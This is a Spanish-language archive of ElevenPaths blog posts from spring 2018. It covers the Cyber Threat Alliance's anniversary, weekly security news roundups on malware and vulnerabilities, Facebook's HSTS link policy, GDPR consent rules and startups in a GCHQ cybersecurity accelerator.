www.elevenpaths.com
7 de mayo de 2018
Primer aniversario de la Cyber Threat Alliance
La necesidad de datos de seguridad relevantes ha experimentado un aumento constante, dado que la gestión de la seguridad de la información se está convirtiendo en un componente clave de cualquier organización moderna. Pero, a diferencia de los datos comerciales tradicionales, en seguridad de la información la relevancia y el contexto pueden originarse tanto dentro como fuera de la organización. Es por esta razón que el intercambio de información y la necesidad de compartirla se han vuelto casi axiomáticos en el mundo de la ciberseguridad. El 18 de abril se celebró en San Francisco, durante la RSA Conference, el primer aniversario de la Cyber Threat Alliance (CTA), una organización sin ánimo de lucro que trabaja para mejorar la ciberseguridad del ecosistema digital global, empleando para ello una plataforma tecnológica para compartir datos avanzados sobre amenazas. Mediante la CTA y sus miembros, se puede compartir información oportuna, accionable, contextualizada y basada en campañas que se utiliza para mejorar sus productos y servicios a fin de proteger mejor a sus clientes, frustrar de manera más sistemática a los adversarios y mejorar la seguridad del ecosistema digital. Pedro Pablo Pérez García, Director Global de Seguridad de Telefónica y CEO de ElevenPaths, con la Junta Directiva de la Cyber Threat Alliance (CTA) Para celebrar su primer aniversario. la CTA organizó un evento (CEO Summit) con los actuales y potenciales futuros miembros, para continuar aumentando la profundidad y amplitud de nuestras capacidades de intercambio de datos. A la cita acudió nuestro CEO y director global de seguridad de Telefónica. Pedro Pablo Pérez, como Miembro Afiliado de la CTA desde febrero de 2017, para dar la bienvenida a los nuevos miembros, compartir nuestra experiencia e interés en la alianza, y alentar a las compañías de ciberseguridad asistentes a considerar la membresía en la CTA. Mesas redondas en el CTA CEO Summit El poder de CTA reside en sus miembros: en solo un año ha crecido de seis a 17 organizaciones de ciberseguridad que se unen para compartir datos de amenazas tempranas en una única plataforma. A pesar de ser competidores, esta colaboración permite a los miembros proteger mejor a sus clientes, permite a los defensores de la red detener a los ciberatacantes y eleva la ciberseguridad general en nuestro ecosistema digital. Desde su fundación en 2017, la CTA ha triplicado su intercambio diario de inteligencia sobre amenazas entre los miembros. Esta información también se ha vuelto más rica y valiosa con el tiempo ya que los miembros incluyen más contexto e inteligencia vinculada. Los miembros de CTA comparten actualmente un promedio de más de 65.000 paquetes de inteligencia de amenazas por día. Esto incluye desde Indicadores de Compromiso (IOC) nuevos, recién detectados por los miembros de la alianza, hasta información de caracterización de amenazas, identificación de actores, y sus técnicas de ataque (TTPs). Al participar en el intercambio de inteligencia, los miembros de la alianza pueden mejorar sus propios productos y servicios, no solo para proteger mejor a sus clientes, sino también para comprender mejor el panorama de amenazas en constante cambio. ElevenPaths contribuye de forma activa a la alianza desde principios de 2017, aportando diariamente toda clase de indicadores de compromiso (IOCs), ficheros maliciosos, e inteligencia procesada que es detectada por las distintas fuentes internas, externas, laboratorio de investigación y trampas que maneja ElevenPaths. A su vez, se ve enriquecida con la inteligencia obtenida de los demás miembros de la alianza. Esto nos permite mantener un elevado nivel de compartición y puntuación dentro de la alianza, y mejorar nuestros servicios de seguridad gestionada. Cyber Threat Alliance (CTA) La Cyber Threat Alliance (CTA), fundada por Check Point Software Technologies Ltd., Cisco, Fortinet, McAfee, Palo Alto Networks y Symantec, es una organización independiente, sin ánimo de lucro, que también incluye IntSights, Juniper Networks, NTT Security, Radware, Rapid7, ReversingLabs, RSA Security, Saint Security, SK Infosec, Sophos y ElevenPaths, la Unidad de Ciberseguridad de Telefónica. CTA es el primer grupo de seguridad cibernética formalmente organizado de la industria que trabajamos juntos de buena fe para compartir información sobre amenazas y mejorar las defensas globales contra ciberdelincuentes. La CTA y sus miembros comparten información concisa, accionable, contextualizada y basada en campañas que se utiliza para mejorar sus productos y servicios, para proteger mejor a sus clientes, reduciendo las capacidades de ataque de los adversarios e interrumpiendo campañas en curso, mejorando de forma activa y temprana la seguridad del ecosistema digital. ¿Qué inteligencia de datos se está compartiendo actualmente? Aproximadamente 65.000 paquetes de STIX (Structured Threat Information Expression) por día, de los cuales más del 90 % son contextualizados (por ejemplo, identificando el actor, familia de malware, servidores de Command & Control asociados, etc). Con un promedio de más de 1.4 millones de puntos. Los paquetes incluyen una variedad de observables y TTP (Tactics, Techniques and Procedures) en todas las fases de Killchain. Los observables incluyen: archivos binarios completos, información de archivos (hashes), URLs, dominios e IPs, la inmensa mayoría de ellos siempre contextualizados con información adicional (actor, familia malware, servidores de Command & Control, etc). TTPs (Tactics, Techniques and Procdures): más de 50 TTP, basadas en las definiciones standard de CybOX del MITRE para un perfecto entendimiento entre todos los miembros de la alianza. La CTA brinda a los miembros acceso a la inteligencia validada que de otro modo no podrían tener. En ElevenPaths seguimos compartiendo inteligencia de amenazas procesable de forma activa y constante a la alianza para que de forma colaborativa entre todos consigamos reducir la actividad maliciosa global. Pablo Alarcón Responsable de Alianzas Estratégicas en ElevenPaths pablo.alarconpadellano@telefonica.com
3 de mayo de 2018
#CyberSecurityPulse: Monero y EternalRomance, la fórmula perfecta
La publicación por parte de ShadowBrokers el año pasado de herramientas pertenencientes a la Agencia de Seguridad Nacional sigue dando que hablar. Un nuevo malware que utiliza la herramienta EternalRomance ha aparecido en escena con Monero-mining. Según el laboratorio FortiGuard de Fortinet, el código malicioso lo han denominado PyRoMine al estar escrito en Python y ha sido descubierto por primera vez este mes. El malware puede descargarse como un archivo ejecutable compilado con PyInstaller por lo que no hay necesidad de instalar Python en la máquina donde se vaya a ejecutar PyRoMine. Una vez instalado, roba silenciosamente recursos de la CPU de las víctimas con el fin de obtener las ganancias en Monero. "No sabemos con seguridad cómo llega a un sistema, pero teniendo en cuenta que este es el tipo de malware que necesita ser distribuido masivamente, es seguro asumir que llega mediante spam o drive-by-download", dijo el investigador de seguridad de FortiGuard Jasper Manuel. De forma preocupante, PyRoMine también configura una cuenta oculta predeterminada en el equipo infectado con privilegios de administrador en el sistema, utilizando la contraseña "P@ssw0rdf0rme". Es probable que esto se utilice para la reinfección y otros ataques, según Manuel. PyRoMine no es el primer minero en usar las herramientas de la NSA. Otros investigadores han descubierto más piezas de malware que utilizan EternalBlue para la minería de criptodivisas con gran éxito, como Adylkuzz, Smominru y WannaMine. Más información en Fortinet Noticias destacadas El gobierno de Estados Unidos y Reino Unido alegan que Rusia se encuentra detrás del crecimiento de ataques a su infraestructura de red En la primera declaración conjunta de este tipo, las autoridades de ciberseguridad de Estados Unidos y Reino Unido han emitido una alerta técnica para advertir a los usuarios de una campaña en curso por parte de atacantes procedentes de Rusia para atacar la infraestructura de red. Los objetivos son dispositivos a todos los niveles, incluidos routers, switches, firewalls, sistemas de detección de intrusiones en la red y otros dispositivos que soportan las operaciones de la red. Con el acceso que han obtenido, son capaces de enmascararse como usuarios privilegiados, lo que les permite modificar las operaciones de los dispositivos para que puedan copiar o redirigir el tráfico hacia su infraestructura. Este acceso también podría permitirles secuestrar los dispositivos para otros fines o apagar por completo las comunicaciones de red. Más información en US CERT Facebook: "Cumplir con las nuevas leyes de privacidad y ofrecer nuevas protecciones de privacidad a todos, sin importar dónde vivas" Así es cómo ha anunciado Facebook sus últimos pasos respecto a la privacidad de sus usuarios con el objetivo de otorgarles más control sobre sus datos como parte del Reglamento General de Protección de Datos (GDPR) de la UE, incluyendo actualizaciones de sus términos y política de datos. En este sentido, se pedirá a todos, independientemente de dónde vivan, que revisen la información importante sobre cómo Facebook utiliza los datos y sobre su privacidad. Los temas a revisar versarán sobre anuncios basados en datos de socios, información sobre los perfiles, tecnología de reconocimiento facial, presentación de mejores herramientas para acceder, eliminar y descargar información, así como ciertos aspectos especiales para los jóvenes. Más información en Facebook Noticias del resto de la semana Atacantes aprovechan un error no corregido en Internet Explorer Se ha identificado que un 0-day en Internet Explorer (IE) se está utilizando para infectar equipos Windows con malware. Investigadores de Qihoo 360 afirman que se está utilizando a escala global mediante la selección de objetivos a través de documentos maliciosos de Office cargados con lo que se denomina una vulnerabilidad "double-kill". Las víctimas deben abrir el documento Office, el cual lanza una página web maliciosa en background para distribuir malware desde un servidor remoto. Según la empresa, la vulnerabilidad afecta a las últimas versiones de IE y otras aplicaciones que utilizan el navegador. Más información en ZDNet La publicación de un exploit para el nuevo fallo de Drupal pone bajo alerta a numerosas webs Apenas unas horas después de que el equipo de Drupal publicara las últimas actualizaciones que corrigen un nuevo fallo de ejecución de código remoto en el software de su sistema de gestión de contenidos, atacantes ya empezaron a explotar dicha vulnerabilidad en internet. La nueva vulnerabilidad descubierta (CVE-2018-7602) afecta al core de Drupal 7 y 8 y permite a los atacantes de forma remota lograr exactamente lo mismo que antes descubrieran el fallo de Drupalgeddon2 (CVE-2018-7600) permitiendo comprometer los sitios web afectados. Más información en The Hacker News Firefox 60 soportará Same-Site Cookies para evitar ataques CSRF La semana pasada Mozilla anunció que la próxima versión de Firefox 60 implementará una nueva protección contra ataques Cross-Site Request Forgery (CSRF) proporcionando soporte para el atributo same-site cookie. Los expertos introducirán el atributo same-site cookie para prevenir este tipo de ataques. Dichos atributos sólo podrán tener dos valores. En el modo "estricto", cuando un usuario hace clic en un enlace entrante de sitios externos a la aplicación, inicialmente se le tratará como "no haber iniciado sesión", incluso si tienen una sesión activa con el sitio. El modo "laxo" está implementado para aplicaciones que pueden ser incompatibles con el modo estricto. En dicho modo, las cookies del mismo sitio se retendrán en las subpeticiones de dominios cruzados (por ejemplo, imágenes o frames), pero se enviarán siempre que un usuario navegue desde un sitio externo, por ejemplo, siguiendo un enlace. Más información en Security Affairs Otras noticias 152.000 dólares robados en Ethereum tras comprometer un DNS de Amazon Más información en SC Magazine ¿Cuáles son las nuevas funcionalidades de Gmail? Más información en Google Un fallo en un plugin de LinkedIn que permite a terceros obtener información de los usuarios Más información en The Hacker News La nueva criptodivisa Bezop filtra información personal de 25 mil usuarios Más información en Security Affairs ¡Regístrate a la newsletter!
1 de mayo de 2018
Facebook cambia la lógica en su política TLS (en parte por nuestro estudio) implementando un HSTS “en ambas direcciones”
Facebook y privacidad. El reciente escándalo de la red social en las últimas semanas no la convierte en el mejor ejemplo precisamente para hablar de privacidad o conexiones seguras en general. Pero ese no es el asunto ahora. Lo cierto es que ha sido la primera web (o más bien, "plataforma") en dar un paso muy interesante e innovador en la política de renovación TLS que está viendo Internet en los últimos años, que implica el refuerzo del concepto TLS en general desde todos frentes: "TLS Everywhere", certificados accesibles o gratuitos, HSTS, Certificate pinning, Certificate Transparency, dar de lado a protocolos antiguos... una profunda revisión del ecosistema a la que Facebook (e Instagram) se unen con una propuesta más que interesante. Ya sabéis de qué va HSTS... el servidor envía una cabecera al navegador para que recuerde que la redirección de HTTP a HTTPS debe hacerse "en local" (a través de un redirect de tipo 307), omitiendo el peligro de un secuestro en la red. La web que ofrece esta cabecera, debe, obviamente, estar disponible por HTTPS, y garantizar un mínimo de buenas prácticas con la autenticación y cifrado que ofrece el TLS. Hasta ahí, estupendo, digamos que alguna que otra vez hemos hablado del asunto, pero, ¿y si le damos la vuelta a la tortilla? Esta es lo que pensaron desde Facebook, y acaban con un concepto más que interesante para mejorar la seguridad global, que quizás sea imitado por otras plataformas. HSTS tiene algunos huecos En su blog de seguridad oficial, Facebook anunciaba hace algunas semanas una actualización a la seguridad de los enlaces en Facebook. ¿En qué consistía? En la entrada de Jon Millican (ingeniero del equipo de privacidad de datos en Facebook) introducía el concepto de HSTS y a continuación, anunciaba una serie de puntos débiles conocidos (vienen de serie con el mecanismo, prácticamente) de HSTS, que iban a intentar cubrir con esta nueva aproximación. Veamos: No todos los navegadores soportan HSTS: Cierto, aunque sí la inmensa mayoría. Es un argumento no muy fuerte, pero que sí suma. El preload no es tan dinámico. Cierto. El preload viene a cubrir ese hueco de "TOFU" (confiar en el primer uso) que es el talón de Aquiles de HSTS. Esa primera conexión con un sitio que se realiza en texto claro porque todavía no ha enviado la primera cabecera HSTS. Esta lista de "preload" está incrustada en los navegadores, y es cierto que no resulta por tanto tan dinámica como debería. La gestiona Google, pero muchos la consumen y se actualiza con las versiones del navegador. No todos los navegadores implementan como deberían el HSTS. Y aquí referencian a nuestro estudio presentado en Black Hat Europa 2017 que demostró que Chrome, Firefox e Internet Explorer gestionan de manera "cuestionable" HSTS y HPKP y que supone un problema que también intentan resolver con su propuesta. Facebook menciona nuestro estudio como una parte de su argumentario para implementar esta mejora Con estos argumentos en las manos, proponen una solución desde su lado. ¿Y si son ellos desde su todopoderosa posición, los que añaden la "S" a HTTPS a todo enlace a otro lugar en Facebook e Instagram? HSTS... en ambas direcciones Mucha gente "vive" en esas webs, y cuando visita algo, sale de ahí hacia otro dominio pinchando en enlaces que Facebook "aloja". Su idea precisamente es que Facebook añada la "S" al protocolo, aunque el usuario que la escribió y enlazó no lo hubiera hecho. Así que lo que han decidido es: Todo dominio que se presente en Facebook e Isntagram para ser "pinchado" por un usuario, y además se encuentre en la lista de "preload" oficial de Google, se le añadirá la "S" para que sea navegado de forma segura. Así cubren a potenciales usurarios con su lista desactualizada o que usen un navegador que no lo soporte. Ellos por su cuenta "crawlearán" la web en general en busca de sitios que ofrezcan HSTS. Si están seguros de ser fiables (no sabemos cómo) añadirán más y más dominios a su lista cada vez para agregarles desde sus propios servidores, la "S" y que los usuarios que lo pinchen no dependan de su navegador para beneficiarse de un HSTS desde la plataforma Facebook. En resumen, un HSTS inverso que viene a complementar potenciales lagunas del mecanismo, y que deberían quizás imitar otros por su sencillez en relación con sus potenciales ventajas. Trabajar desde el punto de vista de una plataforma puramente en el servidor, resulta algo quizás intrusivo pero útil en el contexto Facebook e Instagram, por el diverso perfil de sus usuarios y su popularidad. Esta loable iniciativa se empañó, poco después de su anuncio, por el escándalo de Cambridge Analytic s. HSTS... para todos Con respecto a cubrir huecos que puediera dejar el HSTS, no olvidemos que Google ya dio un paso muy interesante en este sentido. Google, además de todo lo que ya sabemos, es también un registrador de dominios de primer nivel... como por ejemplo: .gle, .prod, .docs, .cal, .soy, .how, .chrome, .ads, .mov, .youtube, .channel, .nexus, .goog, .boo, .dad, .drive, .hangout, .new, .eat, .app, .moto, .ing, .meme, .here... y así hasta 45. En octubre anunció que cargará en la lista de preload por defecto a todo el que registre un dominio en ellos. Esto quiere decir en la práctica que les obliga a que implementen TLS desde el primer momento puesto que Chrome les accederá por el puerto 443 quieran o no. Para rematar, no olvidemos que este año Google también quiere tachar de "no seguro" ya directamente (por ahora con las palabras "No seguro" en la barra de direcciones, pero el aspa roja en Chrome llegará), cualquier cosa por HTTP. Un auténtico acoso y derribo al tráfico no cifrado. Y una oportunidad para los creadores de certificados y CAs... Al final, cualquier cosa con HTTP será marcada como no segura Nuevas versiones de PinPatrol Por cierto, hablando de HSTS... tenemos nuevas versiones de PinPatrol para Chrome y Firefox, con las que se puede controlar mejor las entradas HSTS y HPKP de los navegadores, con mejoras de usabilidad y compatibilidad. Para Firefox: https://www.elevenpaths.com/es/labstools/pin-patrol-2/index.html Para Chrome: http://blog.elevenpaths.com/2016/11/nueva-herramienta-pinpatrol-para-chrome.html Sergio de los Santos ssantos@11paths.com Innovación y laboratorio @ssantosv
30 de abril de 2018
Normativa GDPR: ¿Qué pasa con nuestros datos ahora?
A estas alturas, todos sabemos que el nuevo reglamento de protección de datos personales europeo (GDPR) tiene que convertirse en una realidad en los diferentes estados, obligando a las compañías y organizaciones a garantizar su cumplimiento. El día G, aunque anunciado con bastante anterioridad, se presenta ahora muy cercano, el 25 de mayo de este mismo año. Aunque el nuevo reglamento recoge muchas reglas respecto a cómo los datos personales deben ser tratados por las organizaciones y empresas, el cambio que supone su adopción no implica modificar todo lo que se estaba haciendo ya en materia de protección de la información personal. Muchas de las reglas -que se habían traducido en leyes en nuestro país- y todos los principios fundamentales sobre los que se construyen, siguen siendo los mismos. Sí existe, sin embargo, un cambio fundamental en el carácter que debe tener el consentimiento otorgado por el individuo, generador de los datos, sobre el tratamiento que vayan a recibir estos: ahora este consentimiento debe ser explícito. Vamos a centrarnos en este punto, dejando para discusiones mucho más formales otros aspectos del cumplimiento de la GDPR. Este carácter explícito del consentimiento nos habla de que, a diferencia de lo que venía sucediendo hasta ahora, la persona que ha generado unos datos debe decidir si es posible o no tratar esa información de una forma específica. Este tratamiento nos informa del propósito que se persigue cuando se vaya a realizar el procesamiento de la información. Según GDPR, cada individuo debe estar plenamente informado sobre qué propósito y sobre qué datos se van a utilizar para determinados tratamientos. Y, de esta manera, decidir si se procede con ellos o no. Esta elección debe formalizarse con carácter previo a la realización de cualquier tipo de procesamiento. En última instancia, en lo que respecta a este ámbito, GDPR contempla el control y la transparencia, como guías fundamentales para proporcionar una adecuada protección de los datos personales. ¿Cómo perciben los usuarios de sistemas digitales esta transparencia y este control? Al final, el control sobre la información y el ejercicio de la trasparencia es necesario cuando hay un déficit de confianza en aquellas organizaciones que almacenan nuestros datos o con cuyos servicios interactuamos, generando nuevos datos en el proceso. Es necesario preparar los sistemas y definir los servicios para que cada una de las personas que vayan a interactuar con ellos pueda determinar el nivel de confianza que considere apropiado en su relación con la compañía que los ofrece. Resulta imprescindible asumir que cada individuo es soberano de la confianza que deposita en una empresa y es únicamente él, de forma rotunda, quien debe tener el control sobre su información personal. ¡Todo es confianza! Y en esta sociedad tan digitalizada y conectada, esta confianza es dinámica. La propuesta que se vaya a ofrecer a las personas debe permitirles cambiar de opinión tantas veces como sea necesario. Así se percibirá la utilidad del control y la transparencia, a través de la confianza. ¿Por qué en la aplicación de la GPDR hay ocasiones en la que no nos piden consentimiento?, ¿debe esto minar mi confianza? La GDPR deja bastante claro que para que una organización pueda disponer de un dato es necesaria una clara descripción de la finalidad para disponer de él y, además, dicha finalidad debe ser legítima. Existen seis tipos de "legitimidades": contractuales, legales, de interés vital, de interés público, de interés legítimo y las obtenidas directamente como consentimiento de los individuos. En este último supuesto, una compañía u organización puede almacenar o procesar datos de un individuo ya que así está contemplado en el contrato de los servicios de los que esa persona es cliente. El individuo es el que ha dado autorizado, aunque el tratamiento no sea compatible con el servicio que los genera o por motivos más elevados (legales, vitales, etc.). GDPR obliga a: si una empresa ya tiene los datos por alguna razón de las previas, puede tratar de nuevo el dato sin necesidad de un consentimiento adicional, siempre y cuando esta segunda finalidad sea compatible con la primera, es decir, no se desvíe en exceso de la finalidad con la que se generó. Es importante destacar que el tratamiento de los datos de tráfico, localización y weblogs no pueden basarse ni en interés legítimo, ni en el tratamiento compatible posterior. Por ejemplo, supongamos que una empresa quiere usar los datos que está recogiendo del consumo de un servicio, pensemos, por ejemplo, en una compañía que proporciona suministro eléctrico. Podría facilitarle la compresión de una factura de cualquier cliente y ser proactivo en la definición de cualquier anomalía que en ella pueda aparecer. Para este tratamiento, con esta nueva finalidad, no necesitaría pedir consentimiento a la persona, ya que la propia contratación del servicio ya la hace compatible. Si esta misma empresa incorporara nuevas fuentes de datos, o usara información de localización para enriquecer la información a la factura, en este caso sí sería necesario solicitar explícitamente el consentimiento. En definitiva, GDPR ofrece una visión más conservadora de los derechos de los individuos en lo que respecta a la protección de sus datos personales. Es de obligado cumplimiento por todas las compañías, y está en la mano de cada una de ellas, utilizarla para construir un camino de confianza que para definir nuevos modelos de relación con sus clientes. Antonio Guzmán Sacristan Head of Innovation & Discovery at Telefónica's 4th Platform -AURA Antonio.guzmansacristan@telefonica.com @aguzsac
22 de abril de 2018
Acelerando la ciberseguridad europea entre el Reino Unido y Telefónica (Wayra) – Parte 2 de 2
En la primera parte de este artículo conocimos un poco de la historia del GCHQ y su fundación, como está organizado y la ubicación de sus oficinas centrales. Mencionamos la creación del programa GCHQ Cyber Accelerator que ya está en su segunda edición y los nombres de las 9 startups seleccionadas que están actualmente siendo aceleradas. En esta segunda parte conoceremos un poco más de estas afortunadas startups seleccionadas entre cientos de candidatos y las innovadoras soluciones que proponen: Cybershield Una interesante solución que ayuda a detectar phishing y spear phishing directamente desde el correo electrónico utilizando para ello algoritmos basados en inteligencia artificial y que cambia el color de la línea de asunto del correo electrónico a verde, amarillo o rojo dependiendo de la amenaza. El sistema se instala en el servidor de correo electrónico de la empresa, no produce interrupción del servicio, requiere poca formación y no envía ninguna información fuera de los sistemas de correo de la empresa. Un refuerzo que ayuda a la educación y la conciencia del usuario en lo relacionado con la protección contra malware. Elliptic ¿Te has preguntado alguna vez como se pueden investigar los cibercrímenes que involucran criptomonedas? Elliptic ha convertido a su plataforma en el líder mundial en detección e investigación cibercrímenes relacionados con criptomonedas. Ha creando una plataforma analítica a partir de un conjunto de datos patentado que incorpora una gran cantidad de contenido que cubre mercados en la deepweb, robos y hackeos de Bitcoins, ransomware y una lista negra de más de 20 millones de direcciones de Bitcoin. Adicionalmente dispone de una herramienta de análisis gráfico basada en aprendizaje automático que automatiza el proceso de creación de conexiones entre pseudónimos con las identidades del mundo real para ser empleadas por las fuerzas del orden público. ExactTrack Esta startup diseña y suministra tecnología embebida para proteger los datos y dispositivos, proporcionando al usuario visibilidad y control sobre sus dispositivos aun cuando estos pueden estar apagados. La tecnología de ExactTrack se integra la placa base y los procesadores, es independiente del sistema operativo y permanece activa incluso cuando el dispositivo no está encendido proporcionando control sobre el dispositivo mediante comunicaciones multipath. Mediante las geozonas, permiten el acceso a datos exclusivamente en áreas y horas autorizadas, determinando la ubicación del dispositivo mediante múltiples mecanismos como GPS, GSM, SSIDs (Wifi o Bluetooth) o bien balizas de proximidad para la ubicación en el interior de edificios. El almacenamiento de datos completo puede destruirse físicamente de forma remota a través de su panel en cloud proporcionando un control de gestión y una completa auditoría. Intruder Una plataforma online que detecta las vulnerabilidades de los sistemas de una empresa o negocio que son accesibles desde Internet y proporciona consejos sobre cómo solucionarlas. Las nuevas vulnerabilidades se añaden a la plataforma a medida que se publican y se emiten alertas a los clientes tan pronto como se detectan. Esta solución puede contratarse mediante una cuota mensual para ofrecer seguridad y monitorización continua a las empresas y dispone de dos modalidades de servicio. Una completamente automatizada destinada a las pymes y otra híbrida que combina la automatización con servicios personalizados de personal experto para ofrecer seguridad a grandes empresas. Ioetec Esta startup ha diseñado e implementado una solución plug-and-play en la nube para conectar dispositivos IoT con mecanismos de autenticación extremo a extremos y cifrado. Dado que los dispositivos IoT suelen tener recursos limitados, esta plataforma les proporciona mecanismos de autenticación de confianza y protocolos de cifrado que garantizan que los datos son recopilados, almacenados y entregados sin sufrir cambios o manipulaciones. RazorSecure Proporciona una solución de detección de intrusiones y anomalías especialmente diseñada para los sectores de aviación, ferrocarril y automoción. Se trata de un producto de software con un enfoque diferente, emplea el aprendizaje automático para comprender lo que es normal y detectar aquello que no lo es. El software se puede instalar de forma remota y es ligero, lo que le permite trabajar en sistemas con recursos limitados y en entornos hostiles. Es importante destacar que el sistema permite la protección tanto si dispone de conexión a Internet como si no dispone de ella. Secure Code Warrior Esta solución ayuda a los desarrolladores a escribir código seguro. Para ello, ha desarrollado una solución práctica que emplea técnicas de gamificación para implementar una avanzada plataforma de formación online que permite a los desarrolladores aprender cómo localizar / identificar y solventar las vulnerabilidades en el código. Esta formación es específica del lenguaje y del framework empleado. La plataforma dispone de diferentes modos como entrenamiento, evaluación y torneo. Además, disponen de un complemento para diferentes IDEs de desarrollo que funciona en tiempo real como un "corrector ortográfico" supervisando y ofreciendo ayuda al desarrollador para "evitar" que añada vulnerabilidades a su código. TrustElevate Ofrece a las empresas una solución para recabar el consentimiento verificado de los padres, el control de edad y una gestión de derechos digitales. Los consentimientos son contrastados contra fuentes de datos autorizados y tokens de verificación de edad de forma que se cumple con el nuevo reglamento europeo de protección de datos personales (GDPR, por su siglas en inglés). Este reglamento que entra en vigor el próximo mes de mayo y se aplica globalmente, establece en su artículo 8 que "Cuando el niño sea menor de 16 años, dicho procesamiento será lícito únicamente si, y en la medida en que el consentimiento sea otorgado o autorizado por el titular de la responsabilidad parental sobre el menor". Warden Los robos de información personal en las empresas tardan en ser detectados un promedio de 191 días y pueden suponer importantes sanciones. Warden proporciona una solución software basada en Blockchain que ayuda a detectar robos de información ~ 200x más rápido que el promedio de la industria sin falsos positivos, necesidad de compartir datos o de cambiar su infraestructura actual. La solución genera periódicamente perfiles personales falsos que son anclados en una Blockchain e insertados entre la información de la empresa. La plataforma monitoriza continuamente dichos perfiles y alerta cuando son detectados permitiendo determinar una ventana temporal sobre cuando se produjo el robo de la información y actuar para contener la filtración. Como habéis podido observar estas empresas ofrecen soluciones variadas orientadas a diferentes retos que nos genera la ciberseguridad con soluciones imaginativas e innovadoras. ¿Cuál es tu favorita? Os invito a que conozcáis más sobre estas interesantes startups y nos compartáis vuestras opiniones y comentarios en nuestra comunidad o a través de las redes sociales. Os recuerdo que podéis acceder pinchando aquí. Rames Sarwat Director de Alianzas Estrategicas y Partnerships ElevenPaths (Telefonica Global Cybersecurity Unit) @ramessarwat
19 de abril de 2018
#CyberSecurityPulse: De los bug bounties (tradicionales) a los data abuse bounties
Los grandes de internet están sufriendo lo suyo para ser transparentes con la comunicación sobre la recolección de información que están realizando de sus usuarios. En este sentido, para miniminar el riesgo de ser objeto de determinados ataques, en el caso de Facebook, éste paga millones de dólares cada año a investigadores y a bug hunters para que detecten fallos de seguridad en sus productos e infraestructura, pero tras el escándalo de Cambridge Analytica, la compañía ha lanzado un nuevo tipo bug bounty para recompensar a aquellos que denuncien el "abuso de datos" en su plataforma. A través de su nuevo programa "Data Abuse Bounty", Facebook pediría a terceros que le ayudasen a encontrar desarrolladores de aplicaciones que estén haciendo un mal uso de sus datos. "Ciertos actores pueden recopilar y abusar de forma maliciosa de los datos de los usuarios de Facebook incluso cuando no existen vulnerabilidades de seguridad. Este programa tiene la intención de protegernos contra ese abuso", según la publicación hecha por la compañía. Este programa es el primero de su clase en la industria, donde el foco está en el mal uso de los datos de sus usuarios por parte de los desarrolladores de aplicaciones. El informe remitido a Facebook por los analistas deberá involucrar al menos a 10.000 usuarios de Facebook, explicar no sólo cómo se recopilaron los datos, sino también cómo se abusó de ellos, además de no haber conocido dicho problema por otros medios con anterioridad. Por otro lado, también han facilitado una plataforma en donde se ofrece a los usuarios de la red social toda la información que han ido recopilando sobre un usuario concreto. Medidas que sin duda son necesarias en un momento de desconfianza plena de los gigantes de internet. Más información en Facebook Noticias destacadas Rusia quiere bloquear Telegram tras la negación de la clave de cifrado El regulador ruso de medios de comunicación e Internet ha pedido a un tribunal que bloquee la aplicación de mensajería cifrada Telegram después de que la empresa se negara a dar sus claves de cifrado a las autoridades estatales. El regulador, conocido como Roskomnadzor, presentó la demanda en un tribunal de distrito de Moscú. La demanda, que aún no ha sido publicada, contiene una "solicitud para restringir el acceso al territorio de Rusia a los recursos de información" de la aplicación, dijo en un comunicado. En otras palabras, el gobierno quiere bloquear la aplicación para que no funcione en el país. La demanda llega después de que el servicio de seguridad del Estado ruso, el FSB (antes conocido como el KGB), exigiera que el fabricante de aplicaciones con sede en Dubai entregara sus claves de cifrado, lo que Rusia sostiene que es una demanda legal. El empresario y fundador de la empresa Pavel Durov se negó y el gobierno ruso llevó a Telegram a los tribunales. Más información en ZDNet El director del GCHQ del Reino Unido ha confirmado un importante ciberataque contra el Estado Islámico Según el jefe del GCHQ, el ataque fue lanzado en colaboración con el Ministerio de Defensa del Reino Unido y ha distribuido operaciones del Estado Islámico. La inteligencia británica cree que esta es la primera vez que "han degradado sistemática y persistentemente los esfuerzos online de un adversario como parte de una campaña militar más amplia". Fleming explicó que los ciberexpertos del Reino Unido han actuado para perturbar las actividades online y redes del Estado islámico, y disuadir a un individuo o grupo. "Estas operaciones han hecho una contribución significativa a los esfuerzos de la coalición para suprimir la propaganda de Daesh, han obstaculizado su capacidad de coordinar ataques y han protegido a las fuerzas de la coalición en el campo de batalla", dijo el jefe del GCHQ a una audiencia en la conferencia en Manchester. Más información en Security Affairs Noticias del resto de la semana Microsoft añade protección anti-ransomware y herramientas de recuperación a Office 365 Microsoft ha lanzado una serie de nuevas herramientas para proteger a sus clientes de Office 365 Home y 365 Personal de una gran variedad de ciberamenazas, incluyendo el ransomware. Kirk Koenigsbauer, vicepresidente corporativo de Microsoft para Office, dijo que los suscriptores de estas dos suites de Office recibirán medidas adicionales para protegerse contra el ransomware, amenazas basadas en el correo electrónico, una mayor protección de contraseñas y la comprobación avanzada de links en los productos de Office. Más información en SC Magazine Un fallo en Microsoft Outlook permite robar fácilmente su contraseña de Windows La vulnerabilidad de Microsoft Outlook (CVE-2018-0950) podría permitir a los atacantes robar información confidencial, incluidas las credenciales de inicio de sesión de Windows de los usuarios, simplemente convenciendo a las víctimas de que previsualicen un mensaje de correo electrónico con Microsoft Outlook, sin necesidad de una interacción adicional del usuario. La vulnerabilidad residiría en la forma en que Microsoft Outlook muestra el contenido OLE alojado remotamente cuando se previsualiza un mensaje de correo electrónico RTF (formato de texto enriquecido) y se inician automáticamente las conexiones SMB. Más información en CMU Su Windows podría estar comprometido únicamente con visitar una web Microsoft ha parcheado cinco vulnerabilidades críticas en Windows Graphics Component que residen en el manejo inadecuado de fuentes incrustadas por parte de la biblioteca de fuentes de Windows y que afectan a todas las versiones de los sistemas operativos de Windows hasta la fecha. Un atacante podría engañar a un usuario para que abriera un archivo malicioso o un sitio web especialmente diseñado con la fuente maliciosa, y que si se abre en un navegador web, le daría el control del sistema afectado al atacante. Más información en The Hacker News Otras noticias Threat actors en busca de la vulnerabilidad Drupalgeddon2 Más información en Security Affairs 3,3 millones de dólares robados de la cartera principal de Coinsecure Más información en Security Affairs Nueva técnica de inyección de código utilizada por APT33 denominada Early Bird para eludir la detección mediante herramientas antimalware Más información en Security Affairs ¡Regístrate a la newsletter!
17 de abril de 2018
Análisis técnico de las fases de Cobalt, la pesadilla para la red interna de un banco
